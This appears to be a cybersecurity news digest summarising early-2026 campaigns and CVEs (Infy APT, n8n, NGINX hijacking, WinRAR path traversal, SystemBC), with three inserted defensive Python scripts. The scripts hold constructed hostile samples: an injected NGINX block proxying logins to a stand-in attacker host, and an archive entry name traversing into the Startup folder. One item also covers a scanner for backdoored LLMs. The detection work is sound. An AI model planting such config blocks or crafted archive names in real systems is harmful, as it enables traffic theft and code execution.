Infy APT Resurfaces with Updated Malware and Expanded Targeting

Updated: 05.02.2026 12:25 · First: 21.12.2025 06:22 · 📰 2 src / 2 articles

The Iranian APT group Infy (Prince of Persia) has resumed activity after years of silence, targeting victims in Iran, Iraq, Turkey, India, Canada, and Europe. The group has updated its malware tools Foudre and Tonnerre, employing new techniques such as domain generation algorithms (DGA) and Telegram for command-and-control (C2) communication. The campaign highlights the group's continued relevance and sophistication in cyber espionage. The latest findings reveal that Infy has been active since at least 2004, leveraging malware like Foudre and Tonnerre to profile and exfiltrate data from high-value machines. The group's recent activities include using updated versions of Foudre (version 34) and Tonnerre (versions 12-18, 50), with the latest Tonnerre version detected in September 2025. Infy stopped maintaining its C2 servers on January 8, 2026, coinciding with an internet blackout in Iran, and resumed activity on January 26, 2026, setting up new C2 servers the day before internet restrictions were relaxed. The group has introduced Tornado version 51, which uses both HTTP and Telegram for C2 communication, and has weaponized a recently disclosed (1-day) security flaw in WinRAR to extract the Tornado payload on a compromised host. Additionally, Infy has used a malicious ZIP file to drop ZZ Stealer, which loads a custom variant of the StormKitty infostealer, and there is a strong correlation between the ZZ Stealer attack chain and a campaign targeting the Python Package Index (PyPI) repository.

Zendesk Platform Abused for Email Flood Attacks

Updated: 05.02.2026 12:22 · First: 17.10.2025 14:26 · 📰 3 src / 4 articles

Cybercriminals have exploited lax authentication settings in Zendesk to flood targeted email inboxes with spam messages. The attacks use hundreds of Zendesk corporate customers simultaneously, sending notifications from customer domain names. Zendesk acknowledged the issue and is investigating additional preventive measures. The abuse involves sending ticket creation notifications from customer accounts that allow anonymous submissions. This allows attackers to create support tickets with any chosen subject line, including menacing or insulting messages. The notifications appear to come from legitimate customer domains, making them harder to filter out. The spam wave started on January 18th, 2026, with victims reporting receiving hundreds of emails. Companies impacted include Discord, Tinder, Riot Games, Dropbox, CD Projekt (2k.com), Maya Mobile, NordVPN, Tennessee Department of Labor, Tennessee Department of Revenue, Lightspeed, CTL, Kahoot, Headspace, and Lime. Zendesk has introduced new safety features to detect and stop this type of spam in the future. A fresh wave of spam hit inboxes worldwide on February 4th, 2026, with users reporting being bombarded by automated emails generated through companies' unsecured Zendesk support systems. The emails had subject lines such as 'Activate your account' and similar support-style notifications appearing to originate from different companies.

AI-Enabled Fraud Surges 1210% in 2025

Updated: · First: 05.02.2026 12:05 · 📰 1 src / 1 articles

Fraudsters significantly increased the use of AI to enhance campaigns across voice and virtual meeting channels in 2025, leading to a 1210% rise in AI-enabled fraud compared to a 195% surge in traditional fraud. The fraud tactics, including deepfakes, voice bots, and AI-generated interactions, are cheaper, faster, harder to detect, and more scalable. These methods are now being used in various real-time interactions, from remote job interviews to financial transactions, posing a significant challenge for enterprises. The report highlights that voice fraud often begins with automated bots performing reconnaissance on IVR systems, mapping menu options, and identifying security weak points. Later, these bots return with knowledge about processes and workflows to execute more effective fraud attempts. In enterprise settings, AI is also used to deploy deepfakes of C-suite executives in virtual meetings to trick employees into wiring funds to fraudsters. Healthcare and retail sectors are particularly vulnerable, with bots using intel from IVR probing to socially engineer live agents into enabling account takeovers. In retail, AI-powered return fraud is a growing threat, targeting low-dollar refunds that stay below review thresholds, leading to material losses when bots run continuously.

Multiple Critical n8n Workflow Automation Vulnerabilities (CVE-2025-68613, CVE-2025-68668, CVE-2026-21877, CVE-2026-21858)

Updated: 05.02.2026 08:16 · First: 23.12.2025 09:34 · 📰 12 src / 23 articles

Multiple critical vulnerabilities in the n8n workflow automation platform continue to pose severe risks, with the latest flaw, **CVE-2026-25049 (CVSS 9.4)**, enabling authenticated users to execute arbitrary system commands via malicious workflows. This vulnerability bypasses earlier patches for CVE-2025-68613 and stems from inadequate sanitization in n8n’s expression evaluation, allowing attackers to exploit TypeScript’s compile-time type system mismatches with JavaScript’s runtime behavior. Successful exploitation can lead to server compromise, credential theft, and persistent backdoor installation, with heightened risk when paired with n8n’s public webhook feature. The vulnerabilities collectively affect over **105,000 exposed instances**, primarily in the U.S. and Europe, and impact both self-hosted and cloud deployments. Earlier flaws—including **CVE-2026-21877 (CVSS 10.0)**, **CVE-2026-21858 (CVSS 10.0)**, and sandbox escape vulnerabilities **CVE-2026-1470 (CVSS 9.9)** and **CVE-2026-0863 (CVSS 8.5)**—have already demonstrated the potential for full server takeover, AI workflow hijacking, and exposure of sensitive credentials (API keys, OAuth tokens, database passwords). Patches are available in versions **1.123.17, 2.4.5, 2.5.1, and 2.5.2**, but unpatched systems remain at critical risk. Users are urged to **upgrade immediately**, restrict workflow permissions, and harden deployment environments to mitigate exposure.

React2Shell Exploit Used to Hijack Web Traffic via NGINX Configurations

Updated: · First: 05.02.2026 06:56 · 📰 1 src / 1 articles

Threat actors are exploiting the React2Shell vulnerability (CVE-2025-55182) in NGINX servers to hijack web traffic. The campaign targets Asian TLDs, Chinese hosting infrastructure, and government/educational domains. Malicious NGINX configurations redirect traffic through attacker-controlled servers. The attack involves a multi-stage toolkit with scripts for persistence and traffic redirection. Two IP addresses account for 56% of exploitation attempts, with distinct post-exploitation payloads observed. Additionally, a coordinated reconnaissance campaign targeting Citrix ADC Gateway and Netscaler Gateway infrastructure was discovered, using residential proxies and an Azure IP address.

NGINX Server Traffic Hijacking Campaign

Updated: · First: 05.02.2026 01:26 · 📰 1 src / 1 articles

A threat actor is compromising NGINX servers to hijack and redirect user traffic through attacker-controlled infrastructure. The campaign targets NGINX installations and Baota hosting management panels, particularly affecting sites with Asian top-level domains and government/educational sites. The attackers modify NGINX configuration files to inject malicious 'location' blocks, rerouting traffic via the 'proxy_pass' directive to attacker-controlled domains. The attack uses a multi-stage toolkit to perform these injections, making the traffic appear legitimate by preserving request headers. The campaign is difficult to detect as it does not exploit an NGINX vulnerability but instead hides malicious instructions in configuration files, which are rarely scrutinized. User traffic still reaches its intended destination, often directly, making the attack less noticeable without specific monitoring.
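The "specific monitoring" the summary calls for can be as simple as auditing every `location` block's `proxy_pass` target against an allowlist of known upstreams. The script below is an added example, not code from the original reporting or from NGINX; the sample configuration, the injected block and the hostname `cdn.example-attacker.invalid` are constructed, and the allowlist is an assumption an operator would replace with their own upstreams.

```python
"""Audit an NGINX configuration for ``location`` blocks whose ``proxy_pass``
points at a host outside an operator-defined allowlist.

Added example (not from the original reporting). The configuration text and
every hostname in it are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Constructed sample: a normal site config with one injected block appended.
# The injected block copies the legitimate one's header handling, which is why
# the redirected traffic "looks" like ordinary proxying to casual inspection.
SAMPLE_CONF = """
server {
    listen 80;
    server_name www.example.org;

    location / {
        proxy_pass http://127.0.0.1:8080;
        proxy_set_header Host $host;
    }

    location /static/ {
        root /var/www/html;
    }

    # injected block (constructed): forwards selected paths to an outside host
    location ~ ^/(login|account) {
        proxy_pass https://cdn.example-attacker.invalid;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}
"""


@dataclass
class Finding:
    location: str  # the location matcher, e.g. "/" or "~ ^/(login|account)"
    target: str    # the raw proxy_pass value


_LOCATION_RE = re.compile(r"location\s+([^{]+?)\s*\{")
_PROXY_RE = re.compile(r"proxy_pass\s+([^;\s]+)\s*;")


def _block_body(text, start):
    """Return the text between the brace at ``start`` and its matching close."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    raise ValueError("unbalanced braces in configuration")


def proxy_targets(conf):
    """Yield (location matcher, proxy_pass value) pairs found in ``conf``.

    Comments are stripped first so commented-out directives are not reported.
    Nested location blocks are reported under each enclosing location, which is
    acceptable for an audit that only needs to surface unexpected targets.
    """
    conf = re.sub(r"#[^\n]*", "", conf)
    for m in _LOCATION_RE.finditer(conf):
        body = _block_body(conf, m.end() - 1)
        for p in _PROXY_RE.finditer(body):
            yield m.group(1).strip(), p.group(1)


def _host_of(target):
    """Extract the host from ``scheme://host[:port][/path]`` or an upstream name.

    A value driven by a variable (``$upstream``) is returned as-is so that it is
    flagged for review unless the operator has explicitly allowlisted it.
    """
    m = re.match(r"^(?:https?://)?([^/:]+)", target)
    return m.group(1) if m else target


def audit(conf, allowed_hosts):
    """Return a Finding for every proxy_pass whose host is not allowlisted."""
    allowed = set(allowed_hosts)
    return [Finding(loc, tgt) for loc, tgt in proxy_targets(conf)
            if _host_of(tgt) not in allowed]


if __name__ == "__main__":
    # Allowlist is an assumption: the operator's own upstream hosts.
    for f in audit(SAMPLE_CONF, {"127.0.0.1", "backend"}):
        print(f"suspicious location {f.location!r} -> {f.target}")
```

Running the audit from a cron job against `nginx -T` output, and diffing the result against a known-good baseline, turns a rarely inspected file into a monitored one.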

DragonForce Cartel Ransomware Emerges with Conti-Derived Encryption

Updated: 05.02.2026 00:14 · First: 04.11.2025 15:45 · 📰 3 src / 6 articles

DragonForce, a Conti-derived ransomware operation, has evolved into a cartel-like structure, recruiting affiliates and partnering with Scattered Spider for sophisticated attacks. The group exploits vulnerable drivers to deactivate security programs and has intensified its operations, publishing details of more compromised entities. DragonForce offers affiliates 80% of profits, customizable encryptors, and infrastructure, lowering the barrier to entry for new cybercriminals. The group's partnership with Scattered Spider has enabled high-profile breaches, including the Marks & Spencer incident. DragonForce has also proposed cooperation among major ransomware operations to stabilize the market and increase collective profits. Security experts advise robust backup practices, network segmentation, and consistent patching to defend against such threats.

Threat Actors Use Windows Screensavers to Deploy RMM Tools

Updated: · First: 04.02.2026 23:06 · 📰 1 src / 1 articles

Threat actors are exploiting Windows screensaver files (.scr) in spear-phishing campaigns to bypass security defenses and deploy remote monitoring and management (RMM) tools, granting them interactive remote control over compromised systems. The attack involves luring users into downloading and executing screensaver files hosted on cloud storage platforms, which then install legitimate RMM tools like JWrapper for persistent access. This technique allows attackers to maintain a foothold within the environment, facilitating data theft, lateral movement, and ransomware deployment. The campaign has been observed across multiple organizations, but the threat actors remain unidentified due to the use of consumer cloud storage and lack of consistent infrastructure.

Microsoft Develops Scanner for Detecting Backdoors in Open-Weight LLMs

Updated: · First: 04.02.2026 19:52 · 📰 1 src / 1 articles

Microsoft has developed a lightweight scanner designed to detect backdoors in open-weight large language models (LLMs). The scanner identifies three key signals to flag backdoors while maintaining a low false positive rate. The tool can detect model poisoning, where threat actors embed hidden behaviors into the model's weights during training, causing unintended actions upon trigger detection. The scanner works by analyzing memorized content and attention patterns in LLMs without requiring additional training or prior knowledge of backdoor behavior. The scanner is part of Microsoft's broader initiative to address AI-specific security concerns, including prompt injections and data poisoning, as part of its Secure Development Lifecycle (SDL).

VMware ESXi Sandbox Escape Flaw Exploited in Ransomware Attacks

Updated: · First: 04.02.2026 19:38 · 📰 1 src / 1 articles

CISA has confirmed that ransomware gangs are now exploiting a high-severity VMware ESXi sandbox escape vulnerability (CVE-2025-22225), which was previously used in zero-day attacks. The flaw allows privileged attackers within the VMX process to perform arbitrary kernel writes, leading to a sandbox escape. Broadcom patched this vulnerability in March 2025, but it has since been leveraged in ransomware campaigns. The vulnerability affects multiple VMware products, including ESXi, Fusion, Cloud Foundation, vSphere, Workstation, and Telco Cloud Platform.

VPS Infrastructure Abused for Stealthy SaaS Account Compromises

Updated: 04.02.2026 18:15 · First: 21.08.2025 20:42 · 📰 4 src / 7 articles

Threat actors are exploiting commercial virtual private server (VPS) infrastructure to set up attack infrastructure quickly and discreetly, a tactic observed in coordinated SaaS account compromises across multiple customer environments. VPSs are favored for their low cost, rapid deployment, and minimal open-source intelligence footprint; their abuse has increased in SaaS-targeted campaigns because it lets attackers mimic local traffic, blend into legitimate behavior, bypass geolocation-based defenses, and evade IP reputation checks, making detection and tracking more challenging.

The SystemBC proxy botnet illustrates the trend. Active since at least 2019 and used by various threat actors, including ransomware gangs, to deliver payloads, it maintains a daily average of 1,500 bots and more than 80 command-and-control (C2) servers. Nearly 80% of the bots are compromised VPS systems from several large commercial providers, and the vast majority are susceptible to multiple easy-to-exploit known security flaws: each victim carries an average of 20 unpatched CVEs and at least one critical CVE, with one VPS in the U.S. city of Atlanta vulnerable to more than 160 unpatched CVEs. Close to 40% of the compromises have "extremely long average" infection lifespans of over 31 days. The network is built for volume with little concern for stealth and powers other criminal proxy services, including REM Proxy, a sizeable network that also markets a pool of 20,000 MikroTik routers and a variety of open proxies it finds freely available online, and a Vietnamese-based proxy network called VN5Socks or Shopsocks5. The IP address 104.250.164[.]214 hosts the artifacts and appears to be the source of the attacks that recruit new victims. SystemBC is also used to brute-force WordPress site credentials, which are likely sold to brokers for malicious code injection.

The malware, also known as Coroxy or DroxiDat, turns compromised systems into SOCKS5 relays, allowing threat actors to route malicious traffic through victim machines, and infections have been observed deploying additional malware, expanding the scope of compromise. SystemBC has shown sustained activity and operational resilience across multiple years, establishing itself as a persistent vector in the threat landscape, and has been linked to more than 10,000 infected IP addresses worldwide, including systems associated with sensitive government infrastructure. Silent Push analysts developed a SystemBC-specific tracking fingerprint to identify infections and supporting infrastructure at scale. Infections were globally distributed, with the highest concentration in the U.S., followed by Germany, France, Singapore, and India; many affected systems were hosted in data center environments, which helped infections persist for weeks or months. A previously undocumented SystemBC variant written in Perl was discovered targeting Linux systems, with no detections across 62 antivirus engines. SystemBC C2 infrastructure frequently relies on abuse-tolerant, bulletproof hosting providers, including BTHoster and AS213790 (BTCloud). Over 10,340 victim IP addresses were identified within a single hosting cluster, with infections lasting an average of 38 days and some persisting for more than 100 days; compromised IP addresses used to host official government websites in Burkina Faso and Vietnam were found in the dataset. SystemBC activity often appears early in intrusion chains and frequently precedes ransomware deployment.

Multiple vulnerabilities in Citrix, Git, and GitLab added to CISA KEV catalog

Updated: 04.02.2026 17:42 · First: 26.08.2025 08:55 · 📰 5 src / 8 articles

CISA has added multiple vulnerabilities to its KEV catalog due to active exploitation. The flaws affect Citrix Session Recording, Git, and Citrix NetScaler ADC and NetScaler Gateway. The Citrix Session Recording vulnerabilities were patched in November 2024, the Git flaw (CVE-2025-48384) was addressed in July 2025, and the NetScaler vulnerabilities were patched in August 2025. Additionally, CISA has added a five-year-old GitLab vulnerability (CVE-2021-39935) to its KEV catalog, which is actively being exploited in attacks. Federal agencies must apply mitigations by September 15, 2025, for the earlier vulnerabilities and within 48 hours for the NetScaler vulnerabilities, and by February 24, 2026, for the GitLab vulnerability. The vulnerabilities are CVE-2024-8068, CVE-2024-8069, CVE-2025-48384, CVE-2025-7775, CVE-2025-7776, and CVE-2025-8424. The first two affect Citrix Session Recording, the third affects Git, and the last three affect Citrix NetScaler ADC and NetScaler Gateway. CVE-2025-48384 is an arbitrary file write vulnerability in Git due to inconsistent handling of carriage return characters in configuration files. The vulnerability affects macOS and Linux systems, with Windows systems being immune due to differences in control character usage. The flaw was resolved in Git versions 2.43.7, 2.44.4, 2.45.4, 2.46.4, 2.47.3, 2.48.2, 2.49.1, and 2.50.1. The vulnerability impacts software developers using Git on workstations and CI/CD build systems. CVE-2021-39935 is a server-side request forgery (SSRF) flaw in GitLab that allows unauthenticated attackers to access the CI Lint API. The vulnerability affects GitLab CE/EE versions starting from 10.5 before 14.3.6, all versions starting from 14.4 before 14.4.4, and all versions starting from 14.5 before 14.5.2. GitLab patched the flaw in December 2021. CISA added the flaw to its KEV catalog on February 4, 2026, mandating federal agencies to patch it by February 24, 2026. 
CVE-2025-7775 is a memory overflow vulnerability leading to remote code execution and/or denial-of-service. CVE-2025-7776 is a memory overflow vulnerability leading to unpredictable behavior and denial-of-service. CVE-2025-8424 is an improper access control vulnerability in the NetScaler Management Interface. CVE-2025-7775 has been actively exploited in the wild and was added to the CISA KEV catalog on August 26, 2025, requiring federal agencies to remediate within 48 hours. The vulnerabilities affect both supported and unsupported, end-of-life versions of Citrix NetScaler ADC and NetScaler Gateway. Nearly 20% of NetScaler assets identified are on unsupported versions, primarily in North America and the APAC region. The vulnerabilities affect similar components in NetScaler ADC and NetScaler Gateway as the CitrixBleed and CitrixBleed2 vulnerabilities.
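The Git entry above comes down to a configuration value being read back differently from how it was written when it contains a carriage return. A defender-side pre-clone check can catch that shape before `git submodule update` ever runs. The following is an added example written for this page, not Git's own code: it lints the raw bytes of a `.gitmodules` file and reports any value carrying a CR, plus submodule paths with `..` components or absolute paths. The sample file content and submodule names are constructed for illustration.

```python
"""Lint a .gitmodules file for values that a config parser may read back differently
from how they were written (embedded carriage returns), plus path shapes a submodule
checkout should never use. Added example for CVE-2025-48384; not Git's own code."""
import re
from typing import List, Tuple

# INI-style "key = value" line; `.` does not match LF, so the value keeps any CR.
_KV = re.compile(rb'^\s*(?P<key>[A-Za-z][A-Za-z0-9-]*)\s*=\s*(?P<val>.*)$')
_SECTION = re.compile(rb'^\s*\[submodule\s+"(?P<name>[^"]*)"\]\s*$')


def lint_gitmodules(data: bytes) -> List[Tuple[str, str, str]]:
    """Return (submodule, key, reason) findings.

    `data` must be the file's raw bytes (open in binary mode); a text-mode read
    with universal newlines would silently drop the very CR we are looking for.
    """
    findings: List[Tuple[str, str, str]] = []
    current = "<none>"
    # Split on LF only, so a CR sitting just before the LF stays attached to the value.
    for raw in data.split(b"\n"):
        sec = _SECTION.match(raw)
        if sec:
            current = sec.group("name").decode("utf-8", "replace")
            continue
        kv = _KV.match(raw)
        if not kv:
            continue
        key = kv.group("key").decode()
        val = kv.group("val")
        if b"\r" in val:
            findings.append((current, key, "value contains a carriage return"))
        if key == "path":
            clean = val.rstrip(b"\r").decode("utf-8", "replace")
            parts = re.split(r"[\\/]+", clean)
            if ".." in parts:
                findings.append((current, key, "path escapes the worktree via '..'"))
            if clean.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", clean):
                findings.append((current, key, "path is absolute"))
    return findings


# Constructed sample: the second submodule hides a CR right before the LF in its path,
# the third points outside the worktree. Hostnames are placeholders.
SAMPLE_GITMODULES = (
    b'[submodule "libfoo"]\n'
    b'\tpath = vendor/libfoo\n'
    b'\turl = https://example.invalid/libfoo.git\n'
    b'[submodule "suspicious"]\n'
    b'\tpath = vendor/suspicious\r\n'
    b'\turl = https://example.invalid/suspicious.git\n'
    b'[submodule "escape"]\n'
    b'\tpath = ../outside\n'
    b'\turl = https://example.invalid/escape.git\n'
)


if __name__ == "__main__":
    for sub, key, reason in lint_gitmodules(SAMPLE_GITMODULES):
        print(f"{sub}.{key}: {reason}")
```

Run it from a CI step before any `--recurse-submodules` clone, or wire it into a pre-receive hook on the server side; a non-empty result should fail the job. It is a cheap complement to upgrading Git to a fixed version, not a replacement for it.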

Non-Human Identities Exposed in Docker Hub Container Images

Updated: · First: 04.02.2026 17:05 · 📰 1 src / 1 article

Flare researchers discovered over 10,000 Docker Hub container images leaking production API keys, cloud tokens, CI/CD credentials, and AI model access tokens. These non-human identities (NHIs), which authenticate applications and automated services, often have broad privileges and indefinite lifespans. The exposures highlight systemic issues in credential governance and automated secret detection, with real-world incidents like the Snowflake breach and Home Depot's year-long exposure demonstrating the risks of unmanaged NHIs.

ShadowSyndicate Expands Infrastructure with Reused SSH Fingerprints

Updated: · First: 04.02.2026 17:00 · 📰 1 src / 1 article

ShadowSyndicate, a cybercrime cluster linked to multiple ransomware groups, has expanded its infrastructure. Researchers identified new technical markers, including reused SSH fingerprints, that connect dozens of servers to the same operator. The group has been active since 2023 and maintains a consistent infrastructure pattern. New SSH fingerprints and server transfers between internal clusters were observed, linking previously known servers to newly deployed infrastructure. The group uses commercial red-team frameworks and open-source post-exploitation tools, with ties to ransomware groups like Cl0p, ALPHV/BlackCat, and Ryuk. Group-IB recommends monitoring IoCs, autonomous systems, and unusual login activities to defend against this threat.

EDR Killer Tool Abuses Revoked EnCase Kernel Driver

Updated: · First: 04.02.2026 16:17 · 📰 1 src / 1 article

A custom EDR killer tool has been observed using a revoked but still valid EnCase kernel driver to disable 59 security tools. The attack involved breaching a network via compromised SonicWall SSL VPN credentials and exploiting the lack of multi-factor authentication (MFA). The tool terminates security processes using the driver's kernel-mode IOCTL interface, bypassing Windows protections like Protected Process Light (PPL). The intrusion is suspected to be related to ransomware activity, though the final payload was not deployed.

Path Traversal Vulnerability in WinRAR Actively Exploited by Multiple Threat Actors

Updated: 04.02.2026 16:00 · First: 11.08.2025 08:54 · 📰 4 src / 8 articles

A path traversal vulnerability in WinRAR (CVE-2025-8088, CVSS 8.8) is being actively exploited in the wild. The flaw allows arbitrary code execution by crafting malicious archive files. The vulnerability affects Windows versions of WinRAR, RAR, UnRAR, portable UnRAR source code, and UnRAR.dll. The issue was discovered by researchers from ESET and addressed in WinRAR version 7.13, released on July 30, 2025. Multiple threat actors, including Paper Werewolf, RomCom, UNC4895, APT44, TEMP.Armageddon, Turla, and China-linked actors, have exploited this vulnerability to target various organizations. A new threat actor called Amaranth Dragon, linked to APT41 state-sponsored Chinese operations, has also exploited the CVE-2025-8088 vulnerability in espionage attacks on government and law enforcement agencies in Singapore, Thailand, Indonesia, Cambodia, Laos, and the Philippines. The attacks involve phishing emails with malicious archives that, when opened, exploit the vulnerability to write files outside the intended directory and achieve code execution. The payloads include a .NET loader that sends system information to an external server and receives additional malware. Financially motivated actors are also exploiting the flaw to distribute commodity remote access tools and information stealers. Google Threat Intelligence Group (GTIG) revealed that multiple threat actors, including nation-state adversaries and financially motivated groups, are exploiting the WinRAR vulnerability CVE-2025-8088. The exploit chain often involves concealing the malicious file within the alternate data streams (ADS) of a decoy file inside the archive, causing the payload to be extracted to a specific path (e.g., the Windows Startup folder) and automatically executing it once the user logs in to the machine after a restart.
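The exploit chain summarized above is visible in the archive listing alone: an entry name that carries NTFS alternate data stream syntax (a colon after the decoy file name), parent-directory components, or a path into an autorun location. An extractor or mail gateway can refuse such entries before writing anything to disk. The following is an added example for this page, not code from WinRAR or from any of the cited vendors: a triage function over archive entry names and a constructed listing that exercises it. It is deliberately agnostic about the archive format, so the same rule can be applied to any listing you can obtain (e.g. from `unrar lt` output or a sandbox report).

```python
"""Triage archive entry names for shapes an extractor should refuse.
Added example for CVE-2025-8088 style archives; not WinRAR's or any vendor's code."""
import re
from typing import Dict, List

# Autorun location named in the reporting; matched after separators are normalized.
_STARTUP = re.compile(r"start menu/programs/startup", re.IGNORECASE)


def assess_entry_name(name: str) -> List[str]:
    """Return the reasons this entry name should be rejected (empty list = looks fine)."""
    reasons: List[str] = []
    n = name.replace("\\", "/")
    if re.match(r"^[A-Za-z]:", n):
        reasons.append("absolute path (drive letter)")
        n = n[2:]  # drop the drive prefix so its colon is not mistaken for an ADS
    elif n.startswith("/"):
        reasons.append("absolute path (leading separator)")
    # Any remaining colon is NTFS alternate data stream syntax, e.g. "decoy.pdf:payload".
    if ":" in n:
        reasons.append("NTFS alternate data stream syntax")
    # Refuse every '..' component, even one that would still land inside the target dir.
    if ".." in n.split("/"):
        reasons.append("parent-directory traversal")
    if _STARTUP.search(n):
        reasons.append("targets the Windows Startup folder")
    return reasons


def triage_listing(names: List[str]) -> Dict[str, List[str]]:
    """Map each flagged entry name to its reasons; clean entries are omitted."""
    return {name: r for name in names if (r := assess_entry_name(name))}


# Constructed listing: two benign entries, one relative traversal, and one entry that
# combines an ADS on a decoy document with traversal into the Startup folder.
SAMPLE_LISTING = [
    "report.pdf",
    "images/chart.png",
    "notes/../readme.txt",
    "decoy.pdf:../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/helper.exe",
]


if __name__ == "__main__":
    for entry, reasons in triage_listing(SAMPLE_LISTING).items():
        print(entry, "->", "; ".join(reasons))
```

The check is intentionally strict: a `..` component is rejected even when it resolves inside the extraction directory, because the cost of a false positive on an archive is low and the cost of one missed traversal is a file in an autorun location.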

AI-Driven Phishing Attacks Double in Volume Year-Over-Year

Updated: · First: 04.02.2026 16:00 · 📰 1 src / 1 article

Phishing attacks detected in 2025 more than doubled compared to 2024, with one email caught every 19 seconds. AI technology is enabling threat actors to generate, test, and deploy phishing campaigns at scale, resulting in faster, more adaptive, and more convincing attacks. The rise includes polymorphic, multi-channel campaigns that continuously change their appearance while keeping the same malicious intent. AI is helping threat actors compose emails in near-flawless local languages, contributing to an 18% rise in conversational phishing emails. Other trends include highly personalized campaigns, polymorphism by default, and a surge in the use of remote access tools (RATs). The .es TLD saw a 19-fold increase in use for credential phishing, making it the third-most abused TLD. The report also noted a 204% increase in phishing emails delivering malware in 2025 compared to 2024.